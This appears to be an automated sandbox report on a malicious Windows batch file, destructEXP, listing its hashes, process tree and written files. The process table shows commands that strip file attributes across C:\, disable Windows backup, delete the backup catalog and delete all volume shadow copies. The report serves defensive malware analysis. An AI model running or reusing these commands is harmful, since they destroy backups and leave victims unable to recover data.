File name: | destructEXP.txt |
Full analysis: | https://app.any.run/tasks/2b5b74e2-b8a3-4eb8-8e27-56c86a7fbaa7 |
Verdict: | Malicious activity |
Analysis date: | December 05, 2022, 20:56:20 |
OS: | Windows 7 Professional Service Pack 1 (build: 7601, 32 bit) |
Indicators: | |
MIME: | text/x-msdos-batch |
File info: | DOS batch file, ASCII text, with very long lines, with CRLF line terminators |
MD5: | 09B0299C777DEC3882E187E3E0B58FEF |
SHA1: | D9AEEDB1FC1985609326300F7EDB17AA6A4ABABF |
SHA256: | 535DEBF2E733A9E50DD0604E9795DC8206F2F6EE74326C13F0C756053E25DFC6 |
SSDEEP: | 48:gFSeJFSecJfWEVBfcIBxDp+w+9UretOQTtGSQySxHQD8cFP:g7SLRJvDptiUretOQTtGSQySxHQD8cFP |
PID | CMD | Path | Indicators | Parent process |
---|---|---|---|---|
1328 | "C:\Windows\system32\NOTEPAD.EXE" "C:\Users\admin\Desktop\destructEXP.txt" | C:\Windows\system32\NOTEPAD.EXE | — | Explorer.EXE |
User: admin Company: Microsoft Corporation Integrity Level: MEDIUM Description: Notepad Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3048 | "C:\Windows\System32\cmd.exe" /C "C:\Users\admin\Desktop\destructEXP.bat" | C:\Windows\System32\cmd.exe | Explorer.EXE | |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Windows Command Processor Exit code: 1 Version: 6.1.7601.17514 (win7sp1_rtm.101119-1850) | ||||
3304 | ATTRIB -R -A -S -H -O -I -X -V -P -U -B C:\ /S /D | C:\Windows\system32\attrib.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Attribute Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3608 | ATTRIB -R -A -S -H -O -I -X -V -P -U -B C:\ /S /D /L | C:\Windows\system32\attrib.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Attribute Utility Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3496 | WBADMIN DISABLE BACKUP -quiet | C:\Windows\system32\wbadmin.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Command Line Interface for Microsoft® BLB Backup Exit code: 4294967293 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
3744 | VSSADMIN DELETE SHADOWS /all /quiet | C:\Windows\system32\vssadmin.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Command Line Interface for Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
4072 | C:\Windows\system32\vssvc.exe | C:\Windows\system32\vssvc.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Volume Shadow Copy Service Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
2512 | WBADMIN DELETE CATALOG -quiet | C:\Windows\system32\wbadmin.exe | — | cmd.exe |
User: admin Company: Microsoft Corporation Integrity Level: HIGH Description: Command Line Interface for Microsoft® BLB Backup Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
752 | "C:\Windows\system32\wbengine.exe" | C:\Windows\system32\wbengine.exe | — | services.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Microsoft® Block Level Backup Engine Service EXE Version: 6.1.7600.16385 (win7_rtm.090713-1255) | ||||
1920 | C:\Windows\System32\vdsldr.exe -Embedding | C:\Windows\System32\vdsldr.exe | — | svchost.exe |
User: SYSTEM Company: Microsoft Corporation Integrity Level: SYSTEM Description: Virtual Disk Service Loader Exit code: 0 Version: 6.1.7600.16385 (win7_rtm.090713-1255) |
PID | Process | Filename | Type | |
---|---|---|---|---|
3508 | SearchIndexer.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\tmp.edb | — | |
MD5:— | SHA256:— | |||
956 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | etl | |
MD5:EC4861D04D18CCDFFDC7DE8CA8486422 | SHA256:1ED86DFCD7FD66791D8F0B3A6811A50D240FA2CA84C58C0D98EFE1A7076DD3CA | |||
956 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.3.etl | etl | |
MD5:BAE3F2801589B51E51C678A2BA3D144F | SHA256:56F896A015CBA496AF98465F5DA0D64DAFFB50FFCBEDEAFD671E905B0006FA71 | |||
956 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.0.etl | etl | |
MD5:EC4861D04D18CCDFFDC7DE8CA8486422 | SHA256:1ED86DFCD7FD66791D8F0B3A6811A50D240FA2CA84C58C0D98EFE1A7076DD3CA | |||
3036 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.2.etl | etl | |
MD5:BAE3F2801589B51E51C678A2BA3D144F | SHA256:56F896A015CBA496AF98465F5DA0D64DAFFB50FFCBEDEAFD671E905B0006FA71 | |||
3508 | SearchIndexer.exe | C:\ProgramData\Microsoft\Search\Data\Applications\Windows\MSS.chk | binary | |
MD5:89331BF3F8EFB7B447CD51DE3FC6A50E | SHA256:EC95584EE9A16B1BBEA560BC386C4BD326AF520AE67CBB22018FBEBDEB14D6AD | |||
1328 | NOTEPAD.EXE | C:\Users\admin\Desktop\destructEXP.txt | text | |
MD5:09B0299C777DEC3882E187E3E0B58FEF | SHA256:535DEBF2E733A9E50DD0604E9795DC8206F2F6EE74326C13F0C756053E25DFC6 | |||
3496 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | etl | |
MD5:BAE3F2801589B51E51C678A2BA3D144F | SHA256:56F896A015CBA496AF98465F5DA0D64DAFFB50FFCBEDEAFD671E905B0006FA71 | |||
3496 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.0.etl | etl | |
MD5:BAE3F2801589B51E51C678A2BA3D144F | SHA256:56F896A015CBA496AF98465F5DA0D64DAFFB50FFCBEDEAFD671E905B0006FA71 | |||
3036 | wbadmin.exe | C:\Windows\Logs\WindowsBackup\Wbadmin.1.etl | etl | |
MD5:C2FD499C8E819352A89AFBEE98FB8F25 | SHA256:EACCC640C5BD96E541817E963AE2DB841D66C879F3D5F925FC5887F9E7742E8D |